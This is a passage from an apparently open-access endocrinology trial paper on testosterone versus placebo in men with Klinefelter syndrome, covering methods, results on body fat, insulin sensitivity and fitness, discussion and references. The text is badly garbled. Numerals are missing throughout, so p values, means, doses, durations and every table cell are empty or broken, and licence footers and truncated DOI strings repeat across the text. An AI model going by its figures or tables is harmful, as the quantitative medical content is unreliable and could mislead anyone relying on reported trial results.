osteodensitometer (hologic, waltham, ma, usa). the system software provided the mass of lean body, fat and bone mineral for the whole body and specific regions. appendicular, trunk and visceral trunk fat mass and trunk and appendicular lean body mass were extracted. the cv for the dexa scans was < % as estimated by repeated measurements ( ). the amount of intra-abdominal (visceral) fat was evaluated by ct with a somatom plus-s scanner (siemens). the subjects were studied in the supine position. the areas scanned comprised and mm cross-sectional slices at the umbilicus using kv and mas. the same technician performed all the scans, which subsequently were analyzed by the same radiologist (agj). then a -min submaximal exercise test with continuous monitoring of heart rate was performed on a bicycle ergometer (monark ergometric e, monark exercise, varberg, sweden). we used a workload of – kpm/min, depending on age and reported physical activity by the subject, and maximal aerobic capacity (vo max) was calculated ( ) based on extrapolation of heart rate, age of the participant and weight. the isometric strength of the right biceps and quadriceps muscles was assessed on day by means of a dynamometer (good strength, metitur ltd, jyväskylä, finland), which electronically measures the isometric muscle functions in the upper and lower limbs. the strength was calculated as the mean of three voluntary maximum isometric contractions separated by min intervals. all the participants, ks and controls, underwent -h ambp using an automatic portable apparatus (spacelabs , redmond, washington, usa) at the end of the examination program. the apparatus used an oscillometric method of bp measurement. an appropriate cuff size placed on the left arm was used and readings were obtained every min for a period of h on a normal weekday. time of bed and time of rise in the morning was noted by the participant. microdialysis after application of a local analgesic (lidocaine), microdialysis catheters (cma- ; cma, stockholm, sweden) were inserted in subcutaneous adipose tissue in the periumbilical region. the microdialysis catheters have a molecular cutoff of kda and a membrane length of mm and were perfused at a flow rate of ml/min using cma- perfusion pumps (cma). changes in interstitial glycerol concentration can be taken as an index of lipolysis ( ). glycerol, glucose and lactate in the microdialysis dialysate was measured in duplicate by an automated spectrophotometric kinetic enzymatic analyzer (cma- ). this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://www.dtu.ox.ac.uk/homacalculator/ https://www.dtu.ox.ac.uk/homacalculator/ https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome : statistics all standard statistical calculations were performed using spss for windows version . (spss inc.). data were checked for normality with kolmogorov–smirnov’s test and by plotting. comparisons between groups were done with student’s unpaired t-test or the mann–whitney u test, as appropriate. the development over time during the clamp in different analytes was analyzed with mixed models, as detailed below. we first compared placebo- treated ks with controls, and then we compared the effect of treatment (placebo or testosterone) within the ks group. the comparison of the treated ks and the controls was based on a test for interaction between the group and time factors, i.e. a test for parallel time curves. the effect of treatment within the ks group was based on a mixed model on the differences at each time point for each individual. due to inhomogeneity between the standard deviations at different time points and also between the treated ks and the controls, we used mixed models with unstructured covariance matrices and satterthwaite approximation when calculating p values with sas/stat . proc mixed (sas institute inc. . sas/stat® . user’s guide. cary, nc: sas institute inc. at http:// support.sas.com). we used a per-protocol analysis approach and thus not included the drop-outs in the final analysis. data are shown as mean ± s.d. or median (range). p values < . were regarded as statistically significant. results characteristics of study subjects and body composition during treatment at baseline, males with ks and controls were similar on most body anthropometric composition measures (table ). placebo-treated ks had greater total and intra- abdominal fat mass (p ≤ . ) and lower lumbar bone mineral density (p = . ) (table ) compared with controls at the end of the study. testosterone treatment did not affect crude measures of body composition compared to baseline in males with ks, but weight, bmi, hip and waist circumference increased significantly during placebo treatment (table ). after months, no difference was observed regarding the same measures comparing testosterone and placebo-treated men with ks (table ). however, abdominal fat and total body fat was higher in placebo versus testosterone-treated ks patients evaluated both by dexa and ct (p ≤ . for all, table ). total lean body mass increased during testosterone compared with placebo treatment, approaching statistical significance. two participants dropped out of the study due to perceived side effects. these side effects were not considered to be serious. there were no other reported side effects. insulin sensitivity and circulating metabolites insulin sensitivity was similar in placebo-treated ks and controls (fig. ), while homa-ir tended to be higher (p = . ). glucagon, insulin and ffa showed a similar curvature in ks and controls during the clamp (non-significant interaction term group * time, p values not shown). glucagon and insulin levels were similar in placebo-treated ks and controls during basal (p = . and p = . , respectively) (fig. ) and during the entire clamp, including hyperinsulinemic circumstances (p = . and p = . , respectively), whereas ffa levels were not suppressed to similar levels among males with ks (p = . ) (fig. ). igfbp , but not igf- , was higher in placebo-treated ks as compared to controls (table ). crp was also similar between placebo-treated ks and controls. testosterone treatment did not affect insulin sensitivity in ks (p = . ) (fig. ) or homa-ir (p = . ). insulin and ffa levels were similar in placebo-treated and testosterone-treated ks during basal (p = . and p = . ) and hyperinsulinemic circumstances (p = . and p = . ) (fig. ). glucagon was similar at baseline (p = . ), but slightly lower during testosterone treatment (p = . ). igf-i (p < . ), but not igfbp (p = . ), was higher among testosterone-treated ks compared with placebo (fig. ). sex hormones, gonadotrophins, hemoglobin and hematocrit testosterone and hemoglobin was lower in placebo-treated ks compared with controls, while levels of lh and fsh were higher, whereas levels of shbg, -oh progesterone, dheas and androstenedione were comparable (table ). testosterone, lh and fsh levels were comparable between placebo and testosterone-treated ks patients, whereas shbg levels were suppressed by testosterone treatment in ks (table ). likewise, androstenedione levels were comparable, whereas -oh progesterone and dheas were higher in placebo versus testosterone-treated ks (table ). hemoglobin was higher during testosterone treatment (fig. ), while levels of total cholesterol, ldl cholesterol, hdl cholesterol, triglycerides and alanine aminotransferase were unchanged. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access http://support.sas.com http://support.sas.com https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome pb– : resting ee, physical fitness and muscle strength resting ee was similar between placebo-treated ks and controls during basal and hyperinsulinemic circumstances (results not shown), and likewise, muscle strength was also similar, although numerically lower among placebo- treated ks (table ). vo max was markedly lower in placebo-treated ks compared to controls (p = . ). resting ee and rq during basal and hyperinsulinemic circumstances was unaffected by testosterone treatment (all p > . ). vo max was only marginally affected by testosterone treatment (p = . ), while muscle strength in biceps and quadriceps muscle were comparable between groups (table ). microdialysis interstitial concentrations of glucose baseline levels of interstitial glucose (mmol/l) in abdominal adipose tissue were comparable between placebo-treated ks and controls ( . ± . vs . ± . , respectively, interstitial concentrations of lactate, p = . ), and there were no effects over time (p = . and p = . , basal and clamp periods, respectively). baseline concentrations did not differ between placebo and testosterone-treated ks ( . ± . vs . ± . , p = . ), and no change was seen with time (p = . and p = . , basal and clamp periods, respectively). interstitial concentrations of glycerol baseline concentrations of interstitial glycerol (µmol/l) in abdominal adipose tissue was marginally higher among ks compared with controls ( ± vs ± , respectively, p = . ). there were no effects over time (p = . and p = . , basal and clamp periods, respectively). likewise there was no difference between placebo and testosterone-treated ks ( ± vs ± , p = . ), and no effect over time (p = . and p = . basal and clamp periods, respectively). interstitial concentrations of lactate baseline concentrations of interstitial lactate (mmol/l) in abdominal adipose tissue did not differ between placebo- treated ks and controls ( . ± . vs . ± . , p = . ). there was no difference over time (p = . and p = . , basal and clamp periods, respectively). there was no difference between placebo and testosterone-treated ks ( . ± . vs . ± . , p = . ), and no effect over time for the comparison (p = . and p = . , basal and clamp periods, respectively). -h ambulatory blood pressure no differences between placebo- and testosterone-treated ks patients were detected with respect to any measures from -h ambp. likewise, no differences was seen between placebo-treated ks and controls (table ). discussion this study, to our knowledge, is the first randomized trial of testosterone and placebo in ks studying insulin sensitivity, metabolism, body composition, muscle strength and maximal oxygen uptake. the principal results demonstrate distinct effects of testosterone on body composition, especially reductions in abdominal fat mass and total body fat during a -month course of testosterone treatment in ks. testosterone treatment, on the other hand, did not change glucose homeostasis, circulating levels of free fatty acids or other measures of intermediate metabolism, but we speculate that longer table  age of participants, anthropometric data at baseline in males with klinefelter syndrome and controls at baseline. klinefelter syndrome (mean ± s.d.) control (mean ± s.d.) p value age (years) .  ±  .  ±  . height (cm)  ±   ±  . weight (kg)  ±   ±  . bmi (kg/m )  ±   ±  . baseline testosterone baseline vs testosterone placebo baseline vs placebo testosterone vs placebo weight (kg)  ±   ±  .  ±  . . bmi (kg/m )  ±   ±  .  ±  . . hip (cm)  ±   ±  .  ±  . . waist (cm)  ±   ±  .  ±  . . in the lower part of the table anthropometric data at baseline and during treatment with either placebo or testosterone in klinefelter syndrome is presented. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome : term testosterone treatment would lead to greater changes in body composition and reductions in visceral fat, and in turn eventually increase insulin sensitivity. the reductions in fat mass was accompanied by other testosterone-responsive changes, such as an increase in hemoglobin and igf-i, reductions in shbg and discrete changes in adrenal androgens such as -hydroxy progesterone and dheas, but not androstenedione, showing that active testosterone treatment influences adrenal steroidogenesis in a specific manner ( ). although hemoglobin increased significantly among males with ks during active treatment, the level was still somewhat lower than among controls. the testosterone-induced increase in hemoglobin seems to occur via increased erythropoietin and decreased ferritin and hepcidin ( ). due to the design of the study with withdrawal of study medication the day before examinations, we saw no changes in testosterone, lh and fsh. previously, short-term testosterone gel treatment ( days) of hypogonadal men of different etiologies resulted in increments in lean body mass and reductions in fat mass measured by dexa. the changes occurred in table  body composition determined by ct and dexa, muscle strength, androgens and other hormones, lipids, -h ambulatory blood pressure measurements (mmhg), and vo max in males with klinefelter syndrome during testosterone or placebo treatment and in controls. placebo testosterone p value controls p value placebo vs testosterone placebo vs controls ct total abdominal fat cm  ±   ±  .  ±  < . intra-abdominal fat cm  ±   ±  .  ±  < . ratio visceral vs total fat .  ±  . .  ±  . . .  ±  . . dexa total body fat (kg) .  ±  . .  ±  . . .  ±  . . abdominal fat (kg) .  ±  . .  ±  . . .  ±  . . abdominal lean body mass (g) .  ±  . .  ±  . . .  ±  . . abdominal total mass (g) .  ±  . .  ±  . . .  ±  . . abdominal fat (%) .  ±  . .  ±  . . .  ±  . . visceral fat (g) .  ±  . .  ±  . . .  ±  . . total body lean mass (g) .  ±  . .  ±  . . .  ±  . . total lumbar bmd (g/cm ) .  ±  . .  ±  . . .  ±  . . total hip bmd (g/cm ) .  ±  . .  ±  . . .  ±  . . muscle strength arm – right biceps (nm)  ±   ±  .  ±  . leg – right quadriceps (nm)  ±   ±  .  ±  . bio-chemistry testosterone (nmol/l) .  ±  . .  ±  . . .  ±  . . dheas (nmol/l) .  ±  . .  ±  . . .  ±  . . -hydroxy-progesterone (nmol/l) .  ±  . .  ±  . . .  ±  . . androstenedione (nmol/l) .  ±  . .  ±  . . .  ±  . . lh (iu/l) .  ±  . .  ±  . . .  ±  . < . fsh (iu/l) .  ±  . .  ±  . . .  ±  . < . shbg (nmol/l) .  ±  . .  ±  . . .  ±  . . hemoglobin (mmol/l) .  ±  . .  ±  . . .  ±  . . igf-i (µg/l)  ±   ±  .  ±  . igfbp- (µg/l)  ±   ±  .  ±  . crp (mg/l) .  ±  . .  ±  . . .  ±  . . total cholesterol (mmol/l) .  ±  . .  ±  . . .  ±  . . ldl cholesterol (mmol/l) .  ±  . .  ±  . . .  ±  . . hdl cholesterol (mmol/l) .  ±  . .  ±  . . .  ±  . . triglycerides (mmol/l) .  ±  . .  ±  . . .  ±  . . alanine aminotransferase (u/l)  ±   ±  .  ±  . blood pressure day systolic ambp  ±   ±  .  ±  . night systolic ambp  ±   ±  .  ±  . -h systolic ambp  ±   ±  .  ±  . day diastolic ambp  ±   ±  .  ±  . night diastolic ambp  ±   ±  .  ±  . -h diastolic ambp  ±   ±  .  ±  . exercise capacity vo max (ml o /kg/min) .  ±  . .  ±  . . .  ±  . . this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome pb– : a dose-dependent fashion, but with increments in lean body mass only occurring with testosterone levels in the higher normo-physiological range ( ). woodhouse et  al. studied experimental hypogonadism and -week graded testosterone enanthate treatment ( ). here, low physiological testosterone levels were associated with gains in subcutaneous, intermuscular and intra-abdominal adipose tissue, whereas testosterone levels in the normo- to supra-physiolgical range of . – . nmol/l increased lean body mass and reduced subcutaneous fat mass, but not total body fat or intra-abdominal fat mass ( ). our results are in line with the latter study, since only subcutaneous abdominal and total body fat, but not intra-abdominal fat mass was reduced during testosterone treatment. although lean body mass, physical fitness and maximal muscle strength increased nominally, these changes were not statistically significantly affected by treatment in this study, perhaps because of a limited study sample. notably, males with ks had much lower exercise capacity as evaluated by measurement of vo max, as also previously documented in observational studies ( , ). of note, we saw nominal increases in weight and bmi from baseline through both treatment arms. albeit only significant for the comparison with the placebo arm, these data underline the deleterious body compositional effects of a continuous hypogonadal milieu in these patients. in young boys with ks ( – years of age), treatment with oxandrolone, a non-aromatizable androgen not converted to estradiol, also led to lower body fat as measured by skin fold caliper ( ). in a previous study among males with ks we described a high incidence of the metabolic syndrome and insulin resistance compared with an age-matched control group. about % of ks patients fulfilled the criteria for the metabolic syndrome, compared with % among controls ( , ). similar findings were later reported by ishikawa et  al. ( ). in the current study, testosterone treatment had no effect on insulin-mediated glucose disposal (m value) or insulin sensitivity as expressed by homa-ir index, although a trend toward higher homa-ir was detected in placebo-treated ks compared to controls (p = . ). of note, the males with ks studied here were not overtly obese, but overweight. in an uncontrolled setup, -month testosterone treatment in a group of males with ks with similar body composition was shown to improve homa-ir without changing bmi or waist circumference ( ). in that study, however, homa-ir values were markedly higher than here ( . ± . vs . ± . , respectively for placebo treated ks), and unfortunately, no data on regional body composition bmi (kg/m ) p= . p= . total abdom inal fat by ct (cm ) p< . p= . testosterone intraabdominal fat by ct (cm ) placebo controls p= . p< . placebo m -v a lu e (m g /k g l b m /m in ) testosterone controls figure  (a) bmi, total and intra-abdominal fat in males with klinefelter syndrome and controls. under figure: open circles indicate placebo-treated klinefelter syndrome, closed circles indicate testosterone-treated klinefelter syndrome and open squares indicate controls. p values are indicated in the figure. (b) insulin sensitivity in males with klinefelter syndrome and controls. under figure: round circles indicate placebo-treated ks, black circles indicate testosterone-treated ks and open squares indicate controls. there were no significant difference between groups. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome : were provided. thus, it is not clear whether reductions in intra-abdominal adipose tissue, which is normally believed to reflect insulin sensitivity, did in fact occur in that study following treatment. intermediate metabolism, reflected by free fatty acid and circulating hormones was also unaffected by active treatment. some studies have indicated that testosterone treatment of hypogonadal patients with type diabetes may primarily help obese patients with improvements in insulin sensitivity ( ), while this may not happen in lean patients ( ), which could indicate that testosterone therapy works by affecting ‘modifiable fat’, which usually would be visceral fat. however, a meta-analysis including about men from cross-sectional studies and with type diabetes, showed that testosterone levels were significantly lower in patients with type diabetes even after controlling for age and bmi. here it was concluded that higher testosterone levels lead to a decreased risk of type diabetes mellitus ( ). testosterone may also have direct effects on insulin sensitivity, because in patients with hypogonadotropic hypogonadism, removal of testosterone replacement therapy leads to reductions in insulin sensitivity within only days ( ). we previously showed short-term hypogonadism in healthy males did not affect insulin sensitivity when studied with the gold standard technique, hyperinsulinemic–euglycemic clamp technique ( , ) and neither during weeks induced hypogonadism ( ) or during weeks of treatment with a range of different doses ( ), but -week treatment of healthy lean men with aromatase inhibitors resulted in slight elevation of testosterone, decreased estradiol levels and decreased insulin sensitivity ( ), indicating a role for estradiol in determining insulin sensitivity in males. previously, we have found normal levels of estradiol in males with ks, with higher levels in testosterone-treated ks ( , , ). interestingly, we observed only partial suppression of figure  (a) hemoglobin and igf-i in males with klinefelter syndrome during placebo or testosterone treatment and in controls. (b) ffa, insulin and glucagon at baseline and during clamp conditions. under figure: open circles indicate placebo- treated ks, closed circles indicate testosterone- treated ks and open squares indicate controls. this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome pb– : ffas during the clamp when comparing placebo-treated ks with controls, an indirect sign of insulin resistance. to conclude, there is both epidemiological and clinical evidence that shows a four-fold increased risk of diabetes and metabolic syndrome in ks. presently, there is no evidence to suggest that testosterone replacement therapy of ks patients improves insulin sensitivity, although it is likely that indirect effects on body composition and physical fitness in the longer term will lead to lowered insulin resistance and thus could protect from development of type diabetes. the dissociation reported here between positive changes in body composition and no changes in glucose homeostasis may indicate that the high prevalence of type diabetes in males with ks is a syndrome-specific trait that perhaps need much longer treatment and more precise normalization of testosterone levels to overcome. longer term and larger studies will be needed to show this. we saw a significant effect of testosterone treatment on circulating igf-i, which is otherwise within normal levels in ks, both in childhood and adulthood ( , ), without any change in igfbp- . testosterone acts both via an effect on gh secretion and action, which subsequently enhances and augments the beneficial effects on fat oxidation and protein synthesis ( ). igfbp- was somewhat higher among males with ks, for which we have no ready explanation. we used oral testosterone undecanoate which can show varying bioavailability, but nevertheless has been shown to have effects on body composition before ( ), as also shown here. it may have been more efficacious to use either transdermal or injectable testosterone, which might have led to more pronounced effects on different androgen-responsive measures. although we carefully matched ks and controls, we cannot be sure that the two groups are comparable on socioeconomic factors, habitual physical activity and diet, factors that could for instance affect measures of glucose homeostasis. there were several drop-outs during the study, but there was no common theme in their background for stopping participation in the study. two males with ks dropped out due to reported side effects of the study medication. these were naïve to the effect of testosterone and thought it unpleasant to feel the normal effects of testosterone treatment. we did not find that there were any consistent differences between drop-outs and those that continued participation. the fact that some patients had never received testosterone, while others had and were using testosterone until inclusion in the study, can thus also be seen as a limitation of the study, and although all males with ks were only examined after months of either active treatment or placebo, we cannot exclude that months is an insufficient washout period for effects of testosterone on for example insulin sensitivity. thus, we cannot exclude a type ii error in the present study and inclusion of a larger study group would have been advantageous. originally, it was our intent to include more males with ks, but we experienced a great deal of reluctance because of the months of placebo treatment, which especially the males that were treated before entering the trial saw as problematic. we did not experience any serious adverse effects during the study. in conclusion, testosterone for months induces significant and positive effects on body composition in males with ks, including a reduced abdominal fat mass. we observed no changes in measures of glucose homeostasis, but prolonged treatment with testosterone in ks will likely lead to further positive changes also regarding glucose homeostasis. we observed no serious adverse effects of testosterone treatment. declaration of interest c h is a senior editor for endocrine connections. c h was not involved in the review or editorial process for this paper, on which he is listed as an author. the other authors have nothing to disclose. funding all authors have completed the unified competing interest form at www. icmje.org/coi_disclosure.pdf (available on request from the corresponding author) and declare that this study was supported by grants from the danish medical research council, an unconditional research grant from ipsen pharma, grants from the novo nordisk foundation, aase and einar danielsen foundation and the danish diabetes association. none of the study funders had any role in study design, collection, analysis, interpretation, preparation of the manuscript or in the decision to submit the article for publication. author contribution statement c h, a b, k k, a g j, n h b and c h g contributed substantial to conception and design of the study. c h, k a g, m e and c h g analyzed the data, and c h drafted the manuscript and c h g designed the tables. all authors were involved in the interpretation of the data, critically revised the article and approved the final version for publishing. all authors had full access to the data in the study and take full responsibility for the integrity of the data and the accuracy of the data analysis. chg is the guarantor of the study and affirms that the manuscript is honest, accurate and transparent and no important aspects of the study have been omitted. acknowledgements the technical assistance of lone svendsen, lene christensen, susanne sørensen, hanne petersen, hanne mertz, joan hansen (medical research this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access www.icmje.org/coi_disclosure.pdf www.icmje.org/coi_disclosure.pdf https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome : laboratories) and the staff at the osteoporosis clinic, aarhus university hospital is highly appreciated. the authors also wish to thank the doctors who referred their ks patients to us. references bojesen a, juul s & gravholt ch. prenatal and postnatal prevalence of klinefelter syndrome: a national registry study. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) gravholt ch, chang s, wallentin m, fedder j, moore p & skakkebaek a. klinefelter syndrome – integrating genetics, neuropsychology and endocrinology. endocrine reviews – . (https://doi.org/ . /er. - ) smyth cm & bremner wj. klinefelter syndrome. archives of internal medicine – . (https://doi.org/ . / archinte. . . ) bojesen a, kristensen k, birkebaek nh, fedder j, mosekilde l, bennett p, laurberg p, frystyk j, flyvbjerg a, christiansen js, et al. the metabolic syndrome is frequent in klinefelter’s syndrome and is associated with abdominal obesity and hypogonadism. diabetes care – . (https://doi.org/ . /dc - ) ishikawa t, yamaguchi k, kondo y, takenaka a & fujisawa m. metabolic syndrome in men with klinefelter’s syndrome. urology – . (https://doi.org/ . /j.urology. . . ) swerdlow aj, higgins cd, schoemaker mj, wright af, jacobs pa & united kingdom clinical cytogenetics group. mortality in patients with klinefelter syndrome in britain: a cohort study. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) nielsen j, johansen k & yde h. frequency of diabetes mellitus in patients with klinefelter’s syndrome of different chromosome constitutions and the xyy syndrome. plasma insulin and growth hormone level after a glucose load. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem- - - ) pei d, sheu wh, jeng cy, liao wk & fuh mm. insulin resistance in patients with klinefelter’s syndrome and idiopathic gonadotropin deficiency. journal of the formosan medical association – . grossmann m, thomas mc, panagiotopoulos s, sharpe k, macisaac rj, clarke s, zajac jd & jerums g. low testosterone levels are common and associated with insulin resistance in men with diabetes. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) bojesen a, juul s, birkebaek nh & gravholt ch. morbidity in klinefelter syndrome: a danish register study based on hospital discharge diagnoses. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) grossmann m, gianatti ej & zajac jd. testosterone and type diabetes. current opinion in endocrinology, diabetes, and obesity – . (https://doi.org/ . /med. b e cf) selvin e, feinleib m, zhang l, rohrmann s, rifai n, nelson wg, dobs a, basaria s, golden sh & platz ea. androgens and diabetes in men: results from the third national health and nutrition examination survey (nhanes iii). diabetes care – . (https://doi.org/ . /dc - ) heufelder ae, saad f, bunck mc & gooren l. fifty-two-week treatment with diet and exercise plus transdermal testosterone reverses the metabolic syndrome and improves glycemic control in men with newly diagnosed type diabetes and subnormal plasma testosterone. journal of andrology – . (https://doi. org/ . /jandrol. . ) gopal ra, bothra n, acharya sv, ganesh hk, bandgar tr, menon ps & shah ns. treatment of hypogonadism with testosterone in patients with type diabetes mellitus. endocrine practice – . (https://doi.org/ . /ep .or) wang c, swerdloff rs, iranmanesh a, dobs a, snyder pj, cunningham g, matsumoto am, weber t, berman n & testosterone gel study group. transdermal testosterone gel improves sexual function, mood, muscle strength, and body composition parameters in hypogonadal men. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem. . . ) yialamas ma, dwyer aa, hanley e, lee h, pitteloud n & hayes fj. acute sex steroid withdrawal reduces insulin sensitivity in healthy men with idiopathic hypogonadotropic hypogonadism. journal of clinical endocrinology and metabolism – . (https:// doi.org/ . /jc. - ) zitzmann m, bongers r, werler s, bogdanova n, wistuba j, kliesch s, gromoll j & tuttelmann f. gene expression patterns in relation to the clinical phenotype in klinefelter syndrome. journal of clinical endocrinology and metabolism e –e . (https://doi. org/ . /jc. - ) ozata m, ozisik g, caglayan s, yesilova z, bingol n, saglam m, turan m & beyhan z. effects of gonadotropin and testosterone treatments on plasma leptin levels in male patients with idiopathic hypogonadotropic hypogonadism and klinefelter’s syndrome. hormone and metabolic research – . (https://doi. org/ . /s- - ) rotondi m, coperchini f, renzullo a, accardo g, esposito d, groppelli g, magri f, cittadini a, isidori am, chiovato l, et al. high circulating levels of ccl in patients with klinefelter’s syndrome. clinical endocrinology – . (https://doi.org/ . / cen. ) skakkebaek a, nielsen mm, trolle c, vang s, hornshoj h, hedegaard j, wallentin m, bojesen a, hertz jm, fedder j, et al. dna hypermethylation and differential gene expression associated with klinefelter syndrome. scientific reports . (https://doi. org/ . /s - - - ) frayn kn. calculation of substrate oxidation rates in vivo from gaseous exchange. journal of applied physiology: respiratory, environmental and exercise physiology – . (https://doi. org/ . /jappl. . . . ) orskov h, thomsen hg & yde h. wick chromatography for rapid and reliable immunoassay of insulin, glucagon and growth hormone. nature – . (https://doi.org/ . / b ) abrahamsen b, gram j, hansen tb & beck-nielsen h. cross calibration of qdr- and qdr- dual-energy x-ray densitometers for bone mineral and soft-tissue measurements. bone – . (https://doi.org/ . / - ( ) - ) astrand i. aerobic work capacity in men and women with special reference to age. acta physiologica scandinavica: supplementum – . hagstrom toft e, enoksson s, moberg e, bolinder j & arner p. absolute concentrations of glycerol and lactate in human skeletal muscle, adipose tissue, and blood. american journal of physiology e –e . (https://doi.org/ . /ajpendo. . . .e ) chang s, skakkebaek a, trolle c, bojesen a, hertz jm, cohen a, hougaard dm, wallentin m, pedersen ad, ostergaard jr, et al. anthropometry in klinefelter syndrome – multifactorial influences due to cag length, testosterone treatment and possibly intrauterine hypogonadism. journal of clinical endocrinology and metabolism e –e . (https://doi.org/ . /jc. - ) bachman e, travison tg, basaria s, davda mn, guo w, li m, connor westfall j, bae h, gordeuk v & bhasin s. testosterone induces erythrocytosis via increased erythropoietin and suppressed hepcidin: evidence for a new erythropoietin/hemoglobin set point. journals of gerontology: series a, biological sciences and medical sciences – . (https://doi.org/ . /gerona/glt ) woodhouse lj, gupta n, bhasin m, singh ab, ross r, phillips j & bhasin s. dose-dependent effects of testosterone on regional this work is licensed under a creative commons attribution-noncommercial-noderivatives . international license. https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /er. - https://doi.org/ . /archinte. . . https://doi.org/ . /archinte. . . https://doi.org/ . /dc - https://doi.org/ . /j.urology. . . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jcem- - - https://doi.org/ . /jcem- - - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /med. b e cf https://doi.org/ . /dc - https://doi.org/ . /jandrol. . https://doi.org/ . /jandrol. . https://doi.org/ . /ep .or https://doi.org/ . /jcem. . . https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /jc. - https://doi.org/ . /s- - https://doi.org/ . /s- - https://doi.org/ . /cen. https://doi.org/ . /cen. https://doi.org/ . /s - - - https://doi.org/ . /s - - - https://doi.org/ . /jappl. . . . https://doi.org/ . /jappl. . . . https://doi.org/ . / b https://doi.org/ . / - ( ) - https://doi.org/ . /ajpendo. . . .e https://doi.org/ . /jc. - https://doi.org/ . /gerona/glt https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://creativecommons.org/licenses/by-nc-nd/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com c høst et al. testosterone in klinefelter syndrome pb– : adipose tissue distribution in healthy young men. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) bojesen a, birkebaek n, kristensen k, heickendorff l, mosekilde l, christiansen js & gravholt ch. bone mineral density in klinefelter syndrome is reduced and primarily determined by muscle strength and resorptive markers, but not directly by testosterone. osteoporosis international – . (https://doi.org/ . /s - - - ) davis sm, cox-martin mg, bardsley mz, kowal k, zeitler ps & ross jl. effects of oxandrolone on cardiometabolic health in boys with klinefelter syndrome: a randomized controlled trial. journal of clinical endocrinology and metabolism – . (https://doi. org/ . /jc. - ) host c, bojesen a, frystyk j, flyvbjerg a, christiansen js & gravholt ch. effect of sex hormone treatment on circulating adiponectin and subforms in turner and klinefelter syndrome. european journal of clinical investigation – . (https:// doi.org/ . /j. - . . .x) selice r, caretta n, di mambro a, torino m, palego p, ferlin a & foresta c. prostate volume and growth during testosterone replacement therapy is related to visceral obesity in klinefelter syndrome. european journal of endocrinology – . (https://doi.org/ . /eje- - ) corona g, monami m, rastrelli g, aversa a, sforza a, lenzi a, forti g, mannucci e & maggi m. type diabetes mellitus and testosterone: a meta-analysis study. international journal of andrology – . (https://doi.org/ . /j. - . . .x) host c, gormsen lc, christensen b, jessen n, hougaard dm, christiansen js, pedersen sb, jensen md, nielsen s & gravholt ch. independent effects of testosterone on lipid oxidation and vldl-tg production: a randomized, double-blind, placebo-controlled, crossover study. diabetes – . (https://doi. org/ . /db - ) host c, gormsen lc, hougaard dm, christiansen js, pedersen sb & gravholt ch. acute and short-term chronic testosterone fluctuation effects on glucose homeostasis, insulin sensitivity, and adiponectin: a randomized, double-blind, placebo-controlled, crossover study. journal of clinical endocrinology and metabolism e – e . (https://doi.org/ . /jc. - ) rabiee a, dwyer aa, caronia lm, hayes fj, yialamas 